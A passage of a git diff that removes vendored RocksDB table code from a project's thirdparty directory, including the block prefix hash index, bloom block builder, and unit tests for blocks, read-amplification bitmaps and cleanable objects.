-inline uint32_t EncodeIndex(uint32_t index) {
-  assert(index < kBlockArrayMask);
-  return index | kBlockArrayMask;
-}
-
-// temporary storage for prefix information during index building
-struct PrefixRecord {
-  Slice prefix;
-  uint32_t start_block;
-  uint32_t end_block;
-  uint32_t num_blocks;
-  PrefixRecord* next;
-};
-
-class BlockPrefixIndex::Builder {
- public:
-  explicit Builder(const SliceTransform* internal_prefix_extractor)
-      : internal_prefix_extractor_(internal_prefix_extractor) {}
-
-  void Add(const Slice& key_prefix, uint32_t start_block,
-           uint32_t num_blocks) {
-    PrefixRecord* record = reinterpret_cast<PrefixRecord*>(
-      arena_.AllocateAligned(sizeof(PrefixRecord)));
-    record->prefix = key_prefix;
-    record->start_block = start_block;
-    record->end_block = start_block + num_blocks - 1;
-    record->num_blocks = num_blocks;
-    prefixes_.push_back(record);
-  }
-
-  BlockPrefixIndex* Finish() {
-    // For now, use roughly 1:1 prefix to bucket ratio.
-    uint32_t num_buckets = static_cast<uint32_t>(prefixes_.size()) + 1;
-
-    // Collect prefix records that hash to the same bucket, into a single
-    // linklist.
-    std::vector<PrefixRecord*> prefixes_per_bucket(num_buckets, nullptr);
-    std::vector<uint32_t> num_blocks_per_bucket(num_buckets, 0);
-    for (PrefixRecord* current : prefixes_) {
-      uint32_t bucket = PrefixToBucket(current->prefix, num_buckets);
-      // merge the prefix block span if the first block of this prefix is
-      // connected to the last block of the previous prefix.
-      PrefixRecord* prev = prefixes_per_bucket[bucket];
-      if (prev) {
-        assert(current->start_block >= prev->end_block);
-        auto distance = current->start_block - prev->end_block;
-        if (distance <= 1) {
-          prev->end_block = current->end_block;
-          prev->num_blocks = prev->end_block - prev->start_block + 1;
-          num_blocks_per_bucket[bucket] += (current->num_blocks + distance - 1);
-          continue;
-        }
-      }
-      current->next = prev;
-      prefixes_per_bucket[bucket] = current;
-      num_blocks_per_bucket[bucket] += current->num_blocks;
-    }
-
-    // Calculate the block array buffer size
-    uint32_t total_block_array_entries = 0;
-    for (uint32_t i = 0; i < num_buckets; i++) {
-      uint32_t num_blocks = num_blocks_per_bucket[i];
-      if (num_blocks > 1) {
-        total_block_array_entries += (num_blocks + 1);
-      }
-    }
-
-    // Populate the final prefix block index
-    uint32_t* block_array_buffer = new uint32_t[total_block_array_entries];
-    uint32_t* buckets = new uint32_t[num_buckets];
-    uint32_t offset = 0;
-    for (uint32_t i = 0; i < num_buckets; i++) {
-      uint32_t num_blocks = num_blocks_per_bucket[i];
-      if (num_blocks == 0) {
-        assert(prefixes_per_bucket[i] == nullptr);
-        buckets[i] = kNoneBlock;
-      } else if (num_blocks == 1) {
-        assert(prefixes_per_bucket[i] != nullptr);
-        assert(prefixes_per_bucket[i]->next == nullptr);
-        buckets[i] = prefixes_per_bucket[i]->start_block;
-      } else {
-        assert(total_block_array_entries > 0);
-        assert(prefixes_per_bucket[i] != nullptr);
-        buckets[i] = EncodeIndex(offset);
-        block_array_buffer[offset] = num_blocks;
-        uint32_t* last_block = &block_array_buffer[offset + num_blocks];
-        auto current = prefixes_per_bucket[i];
-        // populate block ids from largest to smallest
-        while (current != nullptr) {
-          for (uint32_t iter = 0; iter < current->num_blocks; iter++) {
-            *last_block = current->end_block - iter;
-            last_block--;
-          }
-          current = current->next;
-        }
-        assert(last_block == &block_array_buffer[offset]);
-        offset += (num_blocks + 1);
-      }
-    }
-
-    assert(offset == total_block_array_entries);
-
-    return new BlockPrefixIndex(internal_prefix_extractor_, num_buckets,
-                                buckets, total_block_array_entries,
-                                block_array_buffer);
-  }
-
- private:
-  const SliceTransform* internal_prefix_extractor_;
-
-  std::vector<PrefixRecord*> prefixes_;
-  Arena arena_;
-};
-
-
-Status BlockPrefixIndex::Create(const SliceTransform* internal_prefix_extractor,
-                                const Slice& prefixes, const Slice& prefix_meta,
-                                BlockPrefixIndex** prefix_index) {
-  uint64_t pos = 0;
-  auto meta_pos = prefix_meta;
-  Status s;
-  Builder builder(internal_prefix_extractor);
-
-  while (!meta_pos.empty()) {
-    uint32_t prefix_size = 0;
-    uint32_t entry_index = 0;
-    uint32_t num_blocks = 0;
-    if (!GetVarint32(&meta_pos, &prefix_size) ||
-        !GetVarint32(&meta_pos, &entry_index) ||
-        !GetVarint32(&meta_pos, &num_blocks)) {
-      s = Status::Corruption(
-          "Corrupted prefix meta block: unable to read from it.");
-      break;
-    }
-    if (pos + prefix_size > prefixes.size()) {
-      s = Status::Corruption(
-        "Corrupted prefix meta block: size inconsistency.");
-      break;
-    }
-    Slice prefix(prefixes.data() + pos, prefix_size);
-    builder.Add(prefix, entry_index, num_blocks);
-
-    pos += prefix_size;
-  }
-
-  if (s.ok() && pos != prefixes.size()) {
-    s = Status::Corruption("Corrupted prefix meta block");
-  }
-
-  if (s.ok()) {
-    *prefix_index = builder.Finish();
-  }
-
-  return s;
-}
-
-uint32_t BlockPrefixIndex::GetBlocks(const Slice& key,
-                                     uint32_t** blocks) {
-  Slice prefix = internal_prefix_extractor_->Transform(key);
-
-  uint32_t bucket = PrefixToBucket(prefix, num_buckets_);
-  uint32_t block_id = buckets_[bucket];
-
-  if (IsNone(block_id)) {
-    return 0;
-  } else if (IsBlockId(block_id)) {
-    *blocks = &buckets_[bucket];
-    return 1;
-  } else {
-    uint32_t index = DecodeIndex(block_id);
-    assert(index < num_block_array_buffer_entries_);
-    *blocks = &block_array_buffer_[index+1];
-    uint32_t num_blocks = block_array_buffer_[index];
-    assert(num_blocks > 1);
-    assert(index + num_blocks < num_block_array_buffer_entries_);
-    return num_blocks;
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_prefix_index.h b/thirdparty/rocksdb/table/block_prefix_index.h
deleted file mode 100644
index dd4282d..0000000
--- a/thirdparty/rocksdb/table/block_prefix_index.h
+++ /dev/null
@@ -1,68 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <stdint.h>
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class Comparator;
-class Iterator;
-class Slice;
-class SliceTransform;
-
-// Build a hash-based index to speed up the lookup for "index block".
-// BlockHashIndex accepts a key and, if found, returns its restart index within
-// that index block.
-class BlockPrefixIndex {
- public:
-
-  // Maps a key to a list of data blocks that could potentially contain
-  // the key, based on the prefix.
-  // Returns the total number of relevant blocks, 0 means the key does
-  // not exist.
-  uint32_t GetBlocks(const Slice& key, uint32_t** blocks);
-
-  size_t ApproximateMemoryUsage() const {
-    return sizeof(BlockPrefixIndex) +
-      (num_block_array_buffer_entries_ + num_buckets_) * sizeof(uint32_t);
-  }
-
-  // Create hash index by reading from the metadata blocks.
-  // @params prefixes: a sequence of prefixes.
-  // @params prefix_meta: contains the "metadata" to of the prefixes.
-  static Status Create(const SliceTransform* hash_key_extractor,
-                       const Slice& prefixes, const Slice& prefix_meta,
-                       BlockPrefixIndex** prefix_index);
-
-  ~BlockPrefixIndex() {
-    delete[] buckets_;
-    delete[] block_array_buffer_;
-  }
-
- private:
-  class Builder;
-  friend Builder;
-
-  BlockPrefixIndex(const SliceTransform* internal_prefix_extractor,
-                   uint32_t num_buckets,
-                   uint32_t* buckets,
-                   uint32_t num_block_array_buffer_entries,
-                   uint32_t* block_array_buffer)
-      : internal_prefix_extractor_(internal_prefix_extractor),
-        num_buckets_(num_buckets),
-        num_block_array_buffer_entries_(num_block_array_buffer_entries),
-        buckets_(buckets),
-        block_array_buffer_(block_array_buffer) {}
-
-  const SliceTransform* internal_prefix_extractor_;
-  uint32_t num_buckets_;
-  uint32_t num_block_array_buffer_entries_;
-  uint32_t* buckets_;
-  uint32_t* block_array_buffer_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_test.cc b/thirdparty/rocksdb/table/block_test.cc
deleted file mode 100644
index f5c5439..0000000
--- a/thirdparty/rocksdb/table/block_test.cc
+++ /dev/null
@@ -1,487 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include <stdio.h>
-#include <algorithm>
-#include <set>
-#include <string>
-#include <unordered_set>
-#include <utility>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "db/write_batch_internal.h"
-#include "db/memtable.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/table.h"
-#include "rocksdb/slice_transform.h"
-#include "table/block.h"
-#include "table/block_builder.h"
-#include "table/format.h"
-#include "util/random.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-static std::string RandomString(Random* rnd, int len) {
-  std::string r;
-  test::RandomString(rnd, len, &r);
-  return r;
-}
-std::string GenerateKey(int primary_key, int secondary_key, int padding_size,
-                        Random *rnd) {
-  char buf[50];
-  char *p = &buf[0];
-  snprintf(buf, sizeof(buf), "%6d%4d", primary_key, secondary_key);
-  std::string k(p);
-  if (padding_size) {
-    k += RandomString(rnd, padding_size);
-  }
-
-  return k;
-}
-
-// Generate random key value pairs.
-// The generated key will be sorted. You can tune the parameters to generated
-// different kinds of test key/value pairs for different scenario.
-void GenerateRandomKVs(std::vector<std::string> *keys,
-                       std::vector<std::string> *values, const int from,
-                       const int len, const int step = 1,
-                       const int padding_size = 0,
-                       const int keys_share_prefix = 1) {
-  Random rnd(302);
-
-  // generate different prefix
-  for (int i = from; i < from + len; i += step) {
-    // generating keys that shares the prefix
-    for (int j = 0; j < keys_share_prefix; ++j) {
-      keys->emplace_back(GenerateKey(i, j, padding_size, &rnd));
-
-      // 100 bytes values
-      values->emplace_back(RandomString(&rnd, 100));
-    }
-  }
-}
-
-class BlockTest : public testing::Test {};
-
-// block test
-TEST_F(BlockTest, SimpleTest) {
-  Random rnd(301);
-  Options options = Options();
-  std::unique_ptr<InternalKeyComparator> ic;
-  ic.reset(new test::PlainInternalKeyComparator(options.comparator));
-
-  std::vector<std::string> keys;
-  std::vector<std::string> values;
-  BlockBuilder builder(16);
-  int num_records = 100000;
-
-  GenerateRandomKVs(&keys, &values, 0, num_records);
-  // add a bunch of records to a block
-  for (int i = 0; i < num_records; i++) {
-    builder.Add(keys[i], values[i]);
-  }
-
-  // read serialized contents of the block
-  Slice rawblock = builder.Finish();
-
-  // create block reader
-  BlockContents contents;
-  contents.data = rawblock;
-  contents.cachable = false;
-  Block reader(std::move(contents), kDisableGlobalSequenceNumber);
-
-  // read contents of block sequentially
-  int count = 0;
-  InternalIterator *iter = reader.NewIterator(options.comparator);
-  for (iter->SeekToFirst();iter->Valid(); count++, iter->Next()) {
-
-    // read kv from block
-    Slice k = iter->key();
-    Slice v = iter->value();
-
-    // compare with lookaside array
-    ASSERT_EQ(k.ToString().compare(keys[count]), 0);
-    ASSERT_EQ(v.ToString().compare(values[count]), 0);
-  }
-  delete iter;
-
-  // read block contents randomly
-  iter = reader.NewIterator(options.comparator);
-  for (int i = 0; i < num_records; i++) {
-
-    // find a random key in the lookaside array
-    int index = rnd.Uniform(num_records);
-    Slice k(keys[index]);
-
-    // search in block for this key
-    iter->Seek(k);
-    ASSERT_TRUE(iter->Valid());
-    Slice v = iter->value();
-    ASSERT_EQ(v.ToString().compare(values[index]), 0);
-  }
-  delete iter;
-}
-
-// return the block contents
-BlockContents GetBlockContents(std::unique_ptr<BlockBuilder> *builder,
-                               const std::vector<std::string> &keys,
-                               const std::vector<std::string> &values,
-                               const int prefix_group_size = 1) {
-  builder->reset(new BlockBuilder(1 /* restart interval */));
-
-  // Add only half of the keys
-  for (size_t i = 0; i < keys.size(); ++i) {
-    (*builder)->Add(keys[i], values[i]);
-  }
-  Slice rawblock = (*builder)->Finish();
-
-  BlockContents contents;
-  contents.data = rawblock;
-  contents.cachable = false;
-
-  return contents;
-}
-
-void CheckBlockContents(BlockContents contents, const int max_key,
-                        const std::vector<std::string> &keys,
-                        const std::vector<std::string> &values) {
-  const size_t prefix_size = 6;
-  // create block reader
-  BlockContents contents_ref(contents.data, contents.cachable,
-                             contents.compression_type);
-  Block reader1(std::move(contents), kDisableGlobalSequenceNumber);
-  Block reader2(std::move(contents_ref), kDisableGlobalSequenceNumber);
-
-  std::unique_ptr<const SliceTransform> prefix_extractor(
-      NewFixedPrefixTransform(prefix_size));
-
-  std::unique_ptr<InternalIterator> regular_iter(
-      reader2.NewIterator(BytewiseComparator()));
-
-  // Seek existent keys
-  for (size_t i = 0; i < keys.size(); i++) {
-    regular_iter->Seek(keys[i]);
-    ASSERT_OK(regular_iter->status());
-    ASSERT_TRUE(regular_iter->Valid());
-
-    Slice v = regular_iter->value();
-    ASSERT_EQ(v.ToString().compare(values[i]), 0);
-  }
-
-  // Seek non-existent keys.
-  // For hash index, if no key with a given prefix is not found, iterator will
-  // simply be set as invalid; whereas the binary search based iterator will
-  // return the one that is closest.
-  for (int i = 1; i < max_key - 1; i += 2) {
-    auto key = GenerateKey(i, 0, 0, nullptr);
-    regular_iter->Seek(key);
-    ASSERT_TRUE(regular_iter->Valid());
-  }
-}
-
-// In this test case, no two key share same prefix.
-TEST_F(BlockTest, SimpleIndexHash) {
-  const int kMaxKey = 100000;
-  std::vector<std::string> keys;
-  std::vector<std::string> values;
-  GenerateRandomKVs(&keys, &values, 0 /* first key id */,
-                    kMaxKey /* last key id */, 2 /* step */,
-                    8 /* padding size (8 bytes randomly generated suffix) */);
-
-  std::unique_ptr<BlockBuilder> builder;
-  auto contents = GetBlockContents(&builder, keys, values);
-
-  CheckBlockContents(std::move(contents), kMaxKey, keys, values);
-}
-
-TEST_F(BlockTest, IndexHashWithSharedPrefix) {
-  const int kMaxKey = 100000;
-  // for each prefix, there will be 5 keys starts with it.
-  const int kPrefixGroup = 5;
-  std::vector<std::string> keys;
-  std::vector<std::string> values;
-  // Generate keys with same prefix.
-  GenerateRandomKVs(&keys, &values, 0,  // first key id
-                    kMaxKey,            // last key id
-                    2,                  // step
-                    10,                 // padding size,
-                    kPrefixGroup);
-
-  std::unique_ptr<BlockBuilder> builder;
-  auto contents = GetBlockContents(&builder, keys, values, kPrefixGroup);
-
-  CheckBlockContents(std::move(contents), kMaxKey, keys, values);
-}
-
-// A slow and accurate version of BlockReadAmpBitmap that simply store
-// all the marked ranges in a set.
-class BlockReadAmpBitmapSlowAndAccurate {
- public:
-  void Mark(size_t start_offset, size_t end_offset) {
-    assert(end_offset >= start_offset);
-    marked_ranges_.emplace(end_offset, start_offset);
-  }
-
-  // Return true if any byte in this range was Marked
-  bool IsPinMarked(size_t offset) {
-    auto it = marked_ranges_.lower_bound(
-        std::make_pair(offset, static_cast<size_t>(0)));
-    if (it == marked_ranges_.end()) {
-      return false;
-    }
-    return offset <= it->first && offset >= it->second;
-  }
-
- private:
-  std::set<std::pair<size_t, size_t>> marked_ranges_;
-};
-
-TEST_F(BlockTest, BlockReadAmpBitmap) {
-  uint32_t pin_offset = 0;
-  SyncPoint::GetInstance()->SetCallBack(
-    "BlockReadAmpBitmap:rnd", [&pin_offset](void* arg) {
-      pin_offset = *(static_cast<uint32_t*>(arg));
-    });
-  SyncPoint::GetInstance()->EnableProcessing();
-  std::vector<size_t> block_sizes = {
-      1,                 // 1 byte
-      32,                // 32 bytes
-      61,                // 61 bytes
-      64,                // 64 bytes
-      512,               // 0.5 KB
-      1024,              // 1 KB
-      1024 * 4,          // 4 KB
-      1024 * 10,         // 10 KB
-      1024 * 50,         // 50 KB
-      1024 * 1024,       // 1 MB
-      1024 * 1024 * 4,   // 4 MB
-      1024 * 1024 * 50,  // 10 MB
-      777,
-      124653,
-  };
-  const size_t kBytesPerBit = 64;
-
-  Random rnd(301);
-  for (size_t block_size : block_sizes) {
-    std::shared_ptr<Statistics> stats = rocksdb::CreateDBStatistics();
-    BlockReadAmpBitmap read_amp_bitmap(block_size, kBytesPerBit, stats.get());
-    BlockReadAmpBitmapSlowAndAccurate read_amp_slow_and_accurate;
-
-    size_t needed_bits = (block_size / kBytesPerBit);
-    if (block_size % kBytesPerBit != 0) {
-      needed_bits++;
-    }
-    size_t bitmap_size = needed_bits / 32;
-    if (needed_bits % 32 != 0) {
-      bitmap_size++;
-    }
-
-    ASSERT_EQ(stats->getTickerCount(READ_AMP_TOTAL_READ_BYTES), block_size);
-
-    // Generate some random entries
-    std::vector<size_t> random_entry_offsets;
-    for (int i = 0; i < 1000; i++) {
-      random_entry_offsets.push_back(rnd.Next() % block_size);
-    }
-    std::sort(random_entry_offsets.begin(), random_entry_offsets.end());
-    auto it =
-        std::unique(random_entry_offsets.begin(), random_entry_offsets.end());
-    random_entry_offsets.resize(
-        std::distance(random_entry_offsets.begin(), it));
-
-    std::vector<std::pair<size_t, size_t>> random_entries;
-    for (size_t i = 0; i < random_entry_offsets.size(); i++) {
-      size_t entry_start = random_entry_offsets[i];
-      size_t entry_end;
-      if (i + 1 < random_entry_offsets.size()) {
-        entry_end = random_entry_offsets[i + 1] - 1;
-      } else {
-        entry_end = block_size - 1;
-      }
-      random_entries.emplace_back(entry_start, entry_end);
-    }
-
-    for (size_t i = 0; i < random_entries.size(); i++) {
-      auto &current_entry = random_entries[rnd.Next() % random_entries.size()];
-
-      read_amp_bitmap.Mark(static_cast<uint32_t>(current_entry.first),
-                           static_cast<uint32_t>(current_entry.second));
-      read_amp_slow_and_accurate.Mark(current_entry.first,
-                                      current_entry.second);
-
-      size_t total_bits = 0;
-      for (size_t bit_idx = 0; bit_idx < needed_bits; bit_idx++) {
-        total_bits += read_amp_slow_and_accurate.IsPinMarked(
-          bit_idx * kBytesPerBit + pin_offset);
-      }
-      size_t expected_estimate_useful = total_bits * kBytesPerBit;
-      size_t got_estimate_useful =
-        stats->getTickerCount(READ_AMP_ESTIMATE_USEFUL_BYTES);
-      ASSERT_EQ(expected_estimate_useful, got_estimate_useful);
-    }
-  }
-  SyncPoint::GetInstance()->DisableProcessing();
-  SyncPoint::GetInstance()->ClearAllCallBacks();
-}
-
-TEST_F(BlockTest, BlockWithReadAmpBitmap) {
-  Random rnd(301);
-  Options options = Options();
-  std::unique_ptr<InternalKeyComparator> ic;
-  ic.reset(new test::PlainInternalKeyComparator(options.comparator));
-
-  std::vector<std::string> keys;
-  std::vector<std::string> values;
-  BlockBuilder builder(16);
-  int num_records = 10000;
-
-  GenerateRandomKVs(&keys, &values, 0, num_records, 1);
-  // add a bunch of records to a block
-  for (int i = 0; i < num_records; i++) {
-    builder.Add(keys[i], values[i]);
-  }
-
-  Slice rawblock = builder.Finish();
-  const size_t kBytesPerBit = 8;
-
-  // Read the block sequentially using Next()
-  {
-    std::shared_ptr<Statistics> stats = rocksdb::CreateDBStatistics();
-
-    // create block reader
-    BlockContents contents;
-    contents.data = rawblock;
-    contents.cachable = true;
-    Block reader(std::move(contents), kDisableGlobalSequenceNumber,
-                 kBytesPerBit, stats.get());
-
-    // read contents of block sequentially
-    size_t read_bytes = 0;
-    BlockIter *iter = static_cast<BlockIter *>(
-        reader.NewIterator(options.comparator, nullptr, true, stats.get()));
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      iter->value();
-      read_bytes += iter->TEST_CurrentEntrySize();
-
-      double semi_acc_read_amp =
-          static_cast<double>(read_bytes) / rawblock.size();
-      double read_amp = static_cast<double>(stats->getTickerCount(
-                            READ_AMP_ESTIMATE_USEFUL_BYTES)) /
-                        stats->getTickerCount(READ_AMP_TOTAL_READ_BYTES);
-
-      // Error in read amplification will be less than 1% if we are reading
-      // sequentially
-      double error_pct = fabs(semi_acc_read_amp - read_amp) * 100;
-      EXPECT_LT(error_pct, 1);
-    }
-
-    delete iter;
-  }
-
-  // Read the block sequentially using Seek()
-  {
-    std::shared_ptr<Statistics> stats = rocksdb::CreateDBStatistics();
-
-    // create block reader
-    BlockContents contents;
-    contents.data = rawblock;
-    contents.cachable = true;
-    Block reader(std::move(contents), kDisableGlobalSequenceNumber,
-                 kBytesPerBit, stats.get());
-
-    size_t read_bytes = 0;
-    BlockIter *iter = static_cast<BlockIter *>(
-        reader.NewIterator(options.comparator, nullptr, true, stats.get()));
-    for (int i = 0; i < num_records; i++) {
-      Slice k(keys[i]);
-
-      // search in block for this key
-      iter->Seek(k);
-      iter->value();
-      read_bytes += iter->TEST_CurrentEntrySize();
-
-      double semi_acc_read_amp =
-          static_cast<double>(read_bytes) / rawblock.size();
-      double read_amp = static_cast<double>(stats->getTickerCount(
-                            READ_AMP_ESTIMATE_USEFUL_BYTES)) /
-                        stats->getTickerCount(READ_AMP_TOTAL_READ_BYTES);
-
-      // Error in read amplification will be less than 1% if we are reading
-      // sequentially
-      double error_pct = fabs(semi_acc_read_amp - read_amp) * 100;
-      EXPECT_LT(error_pct, 1);
-    }
-    delete iter;
-  }
-
-  // Read the block randomly
-  {
-    std::shared_ptr<Statistics> stats = rocksdb::CreateDBStatistics();
-
-    // create block reader
-    BlockContents contents;
-    contents.data = rawblock;
-    contents.cachable = true;
-    Block reader(std::move(contents), kDisableGlobalSequenceNumber,
-                 kBytesPerBit, stats.get());
-
-    size_t read_bytes = 0;
-    BlockIter *iter = static_cast<BlockIter *>(
-        reader.NewIterator(options.comparator, nullptr, true, stats.get()));
-    std::unordered_set<int> read_keys;
-    for (int i = 0; i < num_records; i++) {
-      int index = rnd.Uniform(num_records);
-      Slice k(keys[index]);
-
-      iter->Seek(k);
-      iter->value();
-      if (read_keys.find(index) == read_keys.end()) {
-        read_keys.insert(index);
-        read_bytes += iter->TEST_CurrentEntrySize();
-      }
-
-      double semi_acc_read_amp =
-          static_cast<double>(read_bytes) / rawblock.size();
-      double read_amp = static_cast<double>(stats->getTickerCount(
-                            READ_AMP_ESTIMATE_USEFUL_BYTES)) /
-                        stats->getTickerCount(READ_AMP_TOTAL_READ_BYTES);
-
-      double error_pct = fabs(semi_acc_read_amp - read_amp) * 100;
-      // Error in read amplification will be less than 2% if we are reading
-      // randomly
-      EXPECT_LT(error_pct, 2);
-    }
-    delete iter;
-  }
-}
-
-TEST_F(BlockTest, ReadAmpBitmapPow2) {
-  std::shared_ptr<Statistics> stats = rocksdb::CreateDBStatistics();
-  ASSERT_EQ(BlockReadAmpBitmap(100, 1, stats.get()).GetBytesPerBit(), 1);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 2, stats.get()).GetBytesPerBit(), 2);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 4, stats.get()).GetBytesPerBit(), 4);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 8, stats.get()).GetBytesPerBit(), 8);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 16, stats.get()).GetBytesPerBit(), 16);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 32, stats.get()).GetBytesPerBit(), 32);
-
-  ASSERT_EQ(BlockReadAmpBitmap(100, 3, stats.get()).GetBytesPerBit(), 2);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 7, stats.get()).GetBytesPerBit(), 4);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 11, stats.get()).GetBytesPerBit(), 8);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 17, stats.get()).GetBytesPerBit(), 16);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 33, stats.get()).GetBytesPerBit(), 32);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 35, stats.get()).GetBytesPerBit(), 32);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char **argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/table/bloom_block.cc b/thirdparty/rocksdb/table/bloom_block.cc
deleted file mode 100644
index 6195903..0000000
--- a/thirdparty/rocksdb/table/bloom_block.cc
+++ /dev/null
@@ -1,23 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/bloom_block.h"
-
-#include <string>
-#include "rocksdb/slice.h"
-#include "util/dynamic_bloom.h"
-
-namespace rocksdb {
-
-void BloomBlockBuilder::AddKeysHashes(const std::vector<uint32_t>& keys_hashes) {
-  for (auto hash : keys_hashes) {
-    bloom_.AddHash(hash);
-  }
-}
-
-Slice BloomBlockBuilder::Finish() { return bloom_.GetRawData(); }
-
-const std::string BloomBlockBuilder::kBloomBlock = "kBloomBlock";
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/bloom_block.h b/thirdparty/rocksdb/table/bloom_block.h
deleted file mode 100644
index 9ff610b..0000000
--- a/thirdparty/rocksdb/table/bloom_block.h
+++ /dev/null
@@ -1,38 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <vector>
-#include <string>
-#include "util/dynamic_bloom.h"
-
-namespace rocksdb {
-class Logger;
-
-class BloomBlockBuilder {
- public:
-  static const std::string kBloomBlock;
-
-  explicit BloomBlockBuilder(uint32_t num_probes = 6)
-      : bloom_(num_probes, nullptr) {}
-
-  void SetTotalBits(Allocator* allocator, uint32_t total_bits,
-                    uint32_t locality, size_t huge_page_tlb_size,
-                    Logger* logger) {
-    bloom_.SetTotalBits(allocator, total_bits, locality, huge_page_tlb_size,
-                        logger);
-  }
-
-  uint32_t GetNumBlocks() const { return bloom_.GetNumBlocks(); }
-
-  void AddKeysHashes(const std::vector<uint32_t>& keys_hashes);
-
-  Slice Finish();
-
- private:
-  DynamicBloom bloom_;
-};
-
-};  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/cleanable_test.cc b/thirdparty/rocksdb/table/cleanable_test.cc
deleted file mode 100644
index f18c33b..0000000
--- a/thirdparty/rocksdb/table/cleanable_test.cc
+++ /dev/null
@@ -1,277 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <functional>
-
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/iostats_context.h"
-#include "rocksdb/perf_context.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class CleanableTest : public testing::Test {};
-
-// Use this to keep track of the cleanups that were actually performed
-void Multiplier(void* arg1, void* arg2) {
-  int* res = reinterpret_cast<int*>(arg1);
-  int* num = reinterpret_cast<int*>(arg2);
-  *res *= *num;
-}
-
-// the first Cleanup is on stack and the rest on heap, so test with both cases
-TEST_F(CleanableTest, Register) {
-  int n2 = 2, n3 = 3;
-  int res = 1;
-  { Cleanable c1; }
-  // ~Cleanable
-  ASSERT_EQ(1, res);
-
-  res = 1;
-  {
-    Cleanable c1;
-    c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-  }
-  // ~Cleanable
-  ASSERT_EQ(2, res);
-
-  res = 1;
-  {
-    Cleanable c1;
-    c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-    c1.RegisterCleanup(Multiplier, &res, &n3);  // res = 2 * 3;
-  }
-  // ~Cleanable
-  ASSERT_EQ(6, res);
-
-  // Test the Reset does cleanup
-  res = 1;
-  {
-    Cleanable c1;
-    c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-    c1.RegisterCleanup(Multiplier, &res, &n3);  // res = 2 * 3;
-    c1.Reset();
-    ASSERT_EQ(6, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(6, res);
-
-  // Test Clenable is usable after Reset
-  res = 1;
-  {
-    Cleanable c1;
-    c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-    c1.Reset();
-    ASSERT_EQ(2, res);
-    c1.RegisterCleanup(Multiplier, &res, &n3);  // res = 2 * 3;
-  }
-  // ~Cleanable
-  ASSERT_EQ(6, res);
-}
-
-// the first Cleanup is on stack and the rest on heap,
-// so test all the combinations of them
-TEST_F(CleanableTest, Delegation) {
-  int n2 = 2, n3 = 3, n5 = 5, n7 = 7;
-  int res = 1;
-  {
-    Cleanable c2;
-    {
-      Cleanable c1;
-      c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-      c1.DelegateCleanupsTo(&c2);
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(2, res);
-
-  res = 1;
-  {
-    Cleanable c2;
-    {
-      Cleanable c1;
-      c1.DelegateCleanupsTo(&c2);
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(1, res);
-
-  res = 1;
-  {
-    Cleanable c2;
-    {
-      Cleanable c1;
-      c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-      c1.RegisterCleanup(Multiplier, &res, &n3);  // res = 2 * 3;
-      c1.DelegateCleanupsTo(&c2);
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(6, res);
-
-  res = 1;
-  {
-    Cleanable c2;
-    c2.RegisterCleanup(Multiplier, &res, &n5);  // res = 5;
-    {
-      Cleanable c1;
-      c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-      c1.RegisterCleanup(Multiplier, &res, &n3);  // res = 2 * 3;
-      c1.DelegateCleanupsTo(&c2);                 // res = 2 * 3 * 5;
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
